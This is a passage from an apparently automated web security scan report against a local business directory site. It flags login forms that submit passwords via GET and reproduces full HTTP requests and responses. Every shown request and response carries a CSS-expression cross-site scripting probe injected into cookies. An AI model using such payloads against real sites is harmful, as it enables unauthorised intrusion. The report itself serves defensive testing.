                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

4.8. http://www.local.com/business/details/map/dallas-tx/amegy-bank-97648000/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/map/dallas-tx/amegy-bank-97648000/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /business/details/map/dallas-tx/amegy-bank-97648000/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 39485
Date: Thu, 03 Feb 2011 16:38:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:38:18 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 39485

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Amegy Bank in Dallas, TX - (
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

4.9. http://www.local.com/business/details/map/dallas-tx/cet-products-liquidators-9985416/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/map/dallas-tx/cet-products-liquidators-9985416/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /business/details/map/dallas-tx/cet-products-liquidators-9985416/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 40029
Date: Thu, 03 Feb 2011 16:37:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:37:23 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Cet+Products+%26+Liquidators|Dallas%2c+TX|Appraisal+And+Liquidation+Services|11134700|9985416~Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 40029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Cet Products & Liquidators in
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

4.10. http://www.local.com/business/details/map/dallas-tx/equity-bank-63975058/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/map/dallas-tx/equity-bank-63975058/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /business/details/map/dallas-tx/equity-bank-63975058/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 39437
Date: Thu, 03 Feb 2011 16:37:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:37:36 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058~Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 39437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Equity Bank in Dallas, TX -
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

4.11. http://www.local.com/business/details/map/dallas-tx/hillcrest-bank-104826937/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/map/dallas-tx/hillcrest-bank-104826937/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /business/details/map/dallas-tx/hillcrest-bank-104826937/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 39591
Date: Thu, 03 Feb 2011 16:37:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:37:38 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Hillcrest+Bank|Dallas%2c+TX|Retail+Banks|15020100|104826937~Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 39591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Hillcrest Bank in Dallas, TX
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

4.12. http://www.local.com/business/details/map/dallas-tx/sterling-bank-16856575/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/map/dallas-tx/sterling-bank-16856575/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /business/details/map/dallas-tx/sterling-bank-16856575/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 39493
Date: Thu, 03 Feb 2011 16:37:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:37:50 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Sterling+Bank|Dallas%2c+TX|Retail+Banks|15020100|16856575~Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 39493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Sterling Bank in Dallas, TX -
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

4.13. http://www.local.com/business/results/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/results/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /business/results/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 132916
Date: Thu, 03 Feb 2011 16:40:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:39:59 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fbusiness%2fresults%2f~Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 132916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX banks | Find banks
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

4.14. http://www.local.com/contact.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /contact.aspx

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /contact.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 27733
Date: Thu, 03 Feb 2011 16:53:38 GMT
Content-Length: 27733
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:53:38 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title></title>

<
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

4.15. http://www.local.com/coupons/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.local.com
Path:   /coupons/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Request

GET /coupons/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 103071
Date: Thu, 03 Feb 2011 16:44:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:44:36 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&coupons.kw=; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 103071

